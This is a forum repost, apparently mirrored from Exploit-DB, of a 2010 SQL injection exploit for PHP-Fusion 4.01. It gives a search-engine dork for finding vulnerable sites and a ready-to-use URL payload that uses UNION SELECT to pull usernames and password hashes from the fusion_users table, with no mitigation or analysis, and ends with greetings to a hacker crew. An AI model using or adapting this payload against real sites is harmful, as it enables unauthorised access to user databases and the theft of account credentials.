Exploit PHP-Fusion 4.01 - SQL Injection

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
12635
Проверка EDB
  1. Пройдено
Автор
MA3STR0-DZ
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
N/A
Дата публикации
2010-05-17
Код:
# Exploit Title: PHP-Fusion v4.01 SQL INJECTION Vulnerabilities

# Date: 17/05/2010

# Author: Ma3sTr0-Dz

# Software Link: http://www.php-fusion.co.uk

# Version: 4.01

# CVE : N/A

# Code : [exploit code]

=======================================================PHP-Fusion v4.01 SQL INJECTION Vulnerabilities=======================================================############################################################## Name: PHP-Fusion v4.01 SQL INJECTION Vulnerabilities .
# Vendor: www.php-fusion.co.uk# Date: 2010/05/17# Author: Ma3sTr0-Dz# Home : Www.Sec4ever.Com
# Contact: [email protected]#############################################################

# Part Expl0it & Bug Codes :

---
Dork : allinurl:readmore.php?news_id

http://site.com/readmore.php?news_id=readmore.php?news_id=-1%20'UNION%20SELECT%201,user_name,3,user_password,5,6,7,8,9,10,11%20from%20fusion_users/*

# Thanks to: Cmos_Clr -
 Hard_Hakerz- Sa4D - Mahmoud_SQL - RA3CH - His0k4 - Virus_Hacker_Dz - 
HCJ 



  g0x - Heart_Hunter - D4dy - all sec4ever members & algerian hackers !
 
Источник
www.exploit-db.com

Похожие темы